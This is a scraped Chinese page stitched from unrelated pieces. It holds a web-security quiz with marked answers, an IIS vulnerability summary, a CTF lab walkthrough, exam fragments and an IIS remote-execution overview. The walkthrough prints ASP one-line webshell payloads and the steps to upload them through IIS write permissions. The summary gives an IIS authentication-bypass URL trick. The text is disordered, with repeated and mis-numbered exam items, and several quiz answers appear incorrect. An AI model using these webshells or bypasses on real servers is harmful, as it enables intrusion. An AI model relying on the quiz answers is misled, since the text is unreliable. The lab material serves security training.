tomcat-users.xml34、用于查看/var/log/wtmp日志的命令是 [单选题] *A、 last(正确答案)B、 lastlogC、 lastwtmpD、 lastmp35、Apache的配置文件中,哪个字段定义了访问日志的路径 [单选题] *A、 HttpLogB、 HttpdLogC、 AccessLogD、 CustomLog(正确答案)36、Linux文件权限一共10位长度,分成四段,第三段表示的内容是 [单选题] *A、文件类型B、文件所有者的权限C、文件所有者所在组的权限(正确答案)D、其他用户的权限37、HTTP响应头信息中,allow允许哪种请求方式 [单选题] *A、 GETB、 POSTC、 OPTIONSD、以上都是(正确答案)38、对于下面的状态码,对应关系有错误的是 [单选题] *A、 200 - 请求成功B、 404 -(禁止) 服务器拒绝请求(正确答案)C、 500 - 内部服务器错误D、 405 -(方法禁用) 禁用请求中指定的方法39、下面哪个是网络模型? [单选题] *A、物理层B、传输层C、会话层D、以上都是(正确答案)40、下面不属于sql注入的危害的是 [单选题] *A、数据库信息泄漏B、获取会话信息(正确答案)C、破坏硬盘数据D、网页篡改41、下面sql语句解释不正确的是 [单选题] *A、 SELECT - 从数据库表中获取数据B、 UPDATE - 更新数据库表中的数据C、 DELETE - 从数据库表中删除数据D、 INSERT INTO - 向数据库中插入数据(正确答案)42、常见的数据库操作中,下面哪一个是创建表 [单选题] *A、 CREATE DATABASEB、 DROP TABLEC、 CREATE TABLE(正确答案)D、 ALTER TABLE43、base64()函数在mysql中可以使用的最低版本什么? [单选题] *A、 5.4版本B、 5.5版本C、 5.6版本(正确答案)D、 5.7版本44、下面哪个不是sql注入类型 [单选题] *A、后缀注入(正确答案)B、布尔盲注C、报错注入D、时间盲注45、sql注入漏洞防护中,不正确的是哪一个 [单选题] *A、数据有效性校验B、后缀校验(正确答案)C、用户权限分离D、去除代码中的敏感信息46、sqlmap不支持的数据库有 [单选题] *A、 mysqlB、 mssqlC、 oracleD、 redis(正确答案)47、下面sql语句中,查询当前数据库的是 [单选题] *A、 CREATE DATABASE database-nameB、 select * from [user]C、 union select database(),2,3,4,5(正确答案)D、 SELECT <*, column [alias], …> FROM table48、mysql中不用的注释符有 [单选题] *A、 #B、 /**/C、 --aD、<!>(正确答案)49、常见的上传点有 [单选题] *A、证书上传处B、附件上传处C、编辑器处D、以上都是(正确答案)50、上传中,常见的绕过方式有 [单选题] *A、后缀名黑名单校验B、 waf设备绕过C、自定义正则校验D、以上都是(正确答案)51、下面后缀名与iis解析无关的是 [单选题] *A、 asaB、 php5(正确答案)C、 cerD、 aspx52、下列哪种类型不属于XSS [单选题] *A、反射型B、存储型C、 DOM型D、跨站型(正确答案)53、Apache解析规则下列说法正确的是? [单选题] *A、从左向右B、从右向左(正确答案)C、只取最后一个后缀D、只取第一个后缀54、下面安全意识防范中,哪一个做法是错误的 [单选题] *A、在笔记本或其它地方不要记录口令B、离开电脑前,锁定电脑,设置密码C、可以向管理员和维护人员透露口令(正确答案)D、在多个帐户之间使用不相同的口令55、以下哪个PHP版本环境可能存在0x00截断 [单选题] *A、 5.2(正确答案)B、 5.3C、 5.4D、 5.556、以下哪些工具提供拦截和修改HTTP数据包的功能?() [单选题] *A、 Burpsuite(正确答案)B、 HackbarC、 SqlMapD、 Nmap57、以下哪些工具不可以抓取HTTP数据包?() [单选题] *A、 BurpsuiteB、 WiresharkC、 FiddlerD、 Nmap(正确答案)58、在同一个bash 下依次执行root@kali:~/Desktop# whoamirootroot@kali:~/Desktop# function whoami() { echo 1;}root@kali:~/Desktop# whoami最后一次执行的whoami 的结果是什么?() [单选题] *A、 rootB、 1(正确答案)C、 echo 1D、 echo 1;59、Firefox浏览器插件Hacbar不能提供的功能() [单选题] *A、 POST方式提交数据B、 BASE64编码和解码C、代理修改WEB页面的内容(正确答案)D、修改浏览器访问referer60、这段代码存在的安全问题,不会产生什么安全漏洞?() [单选题] *A、命令执行漏洞B、 SQL注入漏洞C、文件包含漏洞(正确答案)D、反射XSS漏洞61、CSRF、SSRF和重放攻击有什么区别? [填空题]_________________________________答案解析:CSRF是跨站请求伪造攻击由客户端发起 SSRF是服务器端请求伪造由服务器发起重放攻击是将截获的数据包进行重放,达到身份认证等目的62、拿到一个待检测的站,你觉得应该先做什么? [填空题]_________________________________答案解析:信息收集漏洞扫描漏洞利用权限升级日志清除总结报告和修复方案63、mysql的网站注入,5.0以上和5.0以下有什么区别? [填空题]_________________________________答案解析:5.0以上具有更多的功能和性能优化,更加适合处理大型和复杂的数据。
IIS漏洞总结
IIS漏洞总结1.⽂件解析漏洞1.asp;.jpg 1.asp;.zip----->解析成asp2.⽬录解析漏洞*.asp/⽬录下的所有⽂件解析成asp3.iis6 ⽂件上传漏洞条件:1.开启webDAV 2.开启来宾写⼊修改权限扫描是否存在漏洞:利⽤上传脚本iiswrite.exe上传txt再mov 修改位asp脚本4.iis短⽂件枚举利⽤脚本https:///WebBreacher/tilde_enumhttps:///irsdl/IIS-ShortName-Scanner5.CVE-2017-7269 IIS6.0远程代码执⾏漏洞复现参考6.iis6 iis7.5认证绕过利⽤ $i30:$INDEX_ALLOCATION 来绕过例如:http://192.168.253.72:8980/admin:$i30:$INDEX_ALLOCATION/index.php7.漏洞描述在2015年4⽉安全补丁⽇,微软发布的众多安全更新中,修复了HTTP.sys中⼀处允许远程执⾏代码漏洞,编号为:CVE-2015-1635(MS15-034 )。
利⽤HTTP.sys的安全漏洞,攻击者只需要发送恶意的http请求数据包,就可能远程读取IIS服务器的内存数据,或使服务器系统蓝屏崩溃。
根据公告显⽰,该漏洞对服务器系统造成了不⼩的影响,主要影响了包括Windows 7、Windows Server 2008 R2、Windows 8、Windows Server 2012、Windows 8.1 和 Windows Server 2012 R2在内的主流服务器操作系统。
参考。
题目11:IIS write漏洞利用
关卡十一题目:IIS Write漏洞利用关卡描述:IIS写权限对网站系统的安全是致命的,拥有写权限可以直接往网站目录写文件,在拥有写权限的服务器上,其安全相对设置薄弱,因此比较容易被入侵者控制。
写权限漏洞严格意义上讲其实不算是漏洞,因为网站内容始终是要进行编辑和修改的。
只有对文件的权限分配不慎才会造成写权限被利用,进而被植入木马等情况的发生。
建议:1、如果是纯静态页网站,请不要添加写入与删除功能,那么你的空间就是百毒不侵。
2、如果有写入权限,无修改与删除功能,那么你的网站也是非常安全的,就算有入侵它所有写入的文件都不能更改(留下足迹)而你网站本身的文件也是相当安全。
唯一的是可能会写入很多垃圾文件。
3、如果有修改权限,那么与有删除权限其实是一样的。
因为一个文件就算删除不了,我把内容清空那与删除这个文件是一样的效果。
所以分配这些权限需要小心谨慎。
答案提交:1、请提交获取的KEY值。
参考步骤:1.进入关卡十一:2.获取目标主机ip地址3.打开工具场景windows xp4.C:\tools\12.漏洞利用工具\iis写权限漏洞\下iisputscanner.exe进行扫描5.目标系统中搭建网站存在该漏洞,鼠标右击会看到浏览、上传、导出等选项6.选择put file测试一下,默认有该软件作者写的一个alert.txt文件,点击put,提示上传成功.如图:打开浏览器访问目标主机ip/alert.txt,发现确实已经有该文件,且内容和软件里的一致但是直接通过该软件写个asp木马上传是不行的。
使用iiswrite.exe上传内容为<%execute (request("lele"))%> 的文本文件## <%eval request(“a”)%>在桌面先新建一个aa.txt文档,内容如下然后通过使用iiswrite.exe上传文本文件。
菜刀连接一句话木马C盘根目录发现Flag.txt。
安全漏洞挖掘与利用考核试卷
3.以下哪些措施可以有效预防安全漏洞的利用?()
A.定期更新软件
B.使用强密码
C.配置防火墙
D.避免使用外部软件
4.安全漏洞的挖掘可以分为哪些类型?()
A.主动挖掘
B.被动挖掘
C.自动挖掘
D.手动挖掘
5.以下哪些工具常用于自动化安全漏洞挖掘?()
A.模糊测试工具
B.漏洞扫描器
C.代码审计工具
A.本地提权漏洞
B.远程代码执行漏洞
C. XML实体注入漏洞
D.缓冲区溢出漏洞
5.以下哪一项不是安全漏洞利用的前提条件?()
A.存在可利用的漏洞
B.目标系统具有防护措施
C.攻击者具备相应的技术能力
D.攻击者具有非法目的
6.以下哪种技术通常用于防范安全漏洞利用?()
A.防火墙
B.入侵检测系统
C.安全审计
D.向系统开发者报告漏洞
14.以下哪些工具可以帮助检测和预防缓冲区溢出漏洞?()
A.静态分析工具
B.动态分析工具
C.模糊测试工具
D.端口扫描器
15.以下哪些漏洞通常与操作系统有关?()
A.本地提权漏洞
B.远程代码执行漏洞
C.驱动程序缺陷
D.系统服务漏洞
16.以下哪些方法可以用于防范恶意软件传播?()
3.措施包括:使用安全编码标准、进行代码审查、定期安全培训、第三方安全审计和持续的安全测试。
4.遵守道德规范和法律是必要的,以避免对个人隐私、企业利益和社会秩序造成损害。同时,合法合规的行为有助于维护网络安全环境,促进技术健康发展。
11. A
12. C
13. A
14. C
15. A
IIS远程执行漏洞
IIS远程执行漏洞IIS (Internet Information Services) 是一个由微软开发的用于在Windows 操作系统上运行 Web 服务的软件。
它是一种流行的 Web 服务器,广泛用于企业和个人网站。
然而,与任何其他软件一样,IIS也可能存在一些漏洞,其中之一就是远程执行漏洞。
远程执行漏洞是一种常见的安全漏洞,攻击者可以利用该漏洞通过远程执行恶意代码来获取系统的控制权,并进行攻击或者窃取敏感信息。
IIS 远程执行漏洞是指攻击者可以在 Web 服务器上执行任意代码,从而完全控制服务器的漏洞。
这种漏洞可能会导致服务器被入侵,数据泄露,服务中断等严重后果。
IIS远程执行漏洞通常是由于软件本身的设计或者编程错误造成的。
攻击者可以通过发送特制的请求或者利用已知的漏洞,来执行恶意代码并获取服务器的控制权。
攻击者可以通过这种方式来执行各种恶意活动,比如安装恶意软件、窃取敏感信息、发起拒绝服务攻击等。
为了防止IIS远程执行漏洞带来的安全风险,以下是一些建议的安全措施:1.及时更新补丁:微软定期发布更新补丁以修复已知的漏洞,及时更新系统和软件可以有效降低被攻击的风险。
2.配置防火墙:合理配置防火墙可以限制对服务器的访问,降低远程执行漏洞被利用的可能性。
3.使用安全认证:启用强密码策略、多因素认证等措施可以增强服务器对未经授权访问的防范能力。
4.限制权限:仅授予必要的权限给用户和服务,避免赋予过高的权限给不必要的用户。
5.加密通信:使用HTTPS协议加密数据传输,防止数据在传输中被窃取。
6.监控日志:定期检查服务器的日志记录,及时发现异常和攻击行为。
总的来说,保持系统和软件更新是防范远程执行漏洞的基础,同时遵循最佳的安全实践,包括配置防火墙、使用安全认证、限制权限、加密通信等手段可以降低远程执行漏洞的风险。
此外,定期对服务器进行安全审计和监控也是必不可少的安全措施。
最后,如果发现IIS远程执行漏洞或者其他安全漏洞,及时向软件厂商报告并采取相应的措施进行修复,以确保服务器的安全和稳定运行。
- 1、下载文档前请自行甄别文档内容的完整性,平台不提供额外的编辑、内容补充、找答案等附加服务。
- 2、"仅部分预览"的文档,不可在线预览部分如存在完整性等问题,可反馈申请退款(可完整预览的文档不适用该条件!)。
- 3、如文档侵犯您的权益,请联系客服反馈,我们会尽快为您处理(人工客服工作时间:9:00-18:30)。
关卡十一
题目:IIS Write漏洞利用
关卡描述:
IIS写权限对网站系统的安全是致命的,拥有写权限可以直接往网站目录写文件,在拥有写权限的服务器上,其安全相对设置薄弱,因此比较容易被入侵者控制。
写权限漏洞严格意义上讲其实不算是漏洞,因为网站内容始终是要进行编辑和修改的。
只有对文件的权限分配不慎才会造成写权限被利用,进而被植入木马等情况的发生。
建议:
1、如果是纯静态页网站,请不要添加写入与删除功能,那么你的空间就是百毒不侵。
2、如果有写入权限,无修改与删除功能,那么你的网站也是非常安全的,就算有入侵它所有写入的文件都不能更改(留下足迹)而你网站本身的文件也是相当安全。
唯一的是可能会写入很多垃圾文件。
3、如果有修改权限,那么与有删除权限其实是一样的。
因为一个文件就算删除不了,我把内容清空那与删除这个文件是一样的效果。
所以分配这些权限需要小心谨慎。
答案提交:
1、请提交获取的KEY值。
参考步骤:
1.进入关卡十一:
2.获取目标主机ip地址
3.打开工具场景windows xp
4.C:\tools\12.漏洞利用工具\iis写权限漏洞\下iisputscanner.exe进行扫描
5.目标系统中搭建网站存在该漏洞,鼠标右击会看到浏览、上传、导出等选项
6.选择put file测试一下,默认有该软件作者写的一个alert.txt文件,点击put,提示上传成功.如图:
打开浏览器访问目标主机ip/alert.txt,发现确实已经有该文件,且内容和软件里的一致
但是直接通过该软件写个asp木马上传是不行的。
使用iiswrite.exe上传内容为<%execute (request("lele"))%> 的文本文件## <%eval request(“a”)%>
在桌面先新建一个aa.txt文档,内容如下
然后通过使用iiswrite.exe上传文本文件。
菜刀连接一句话木马
C盘根目录发现Flag.txt。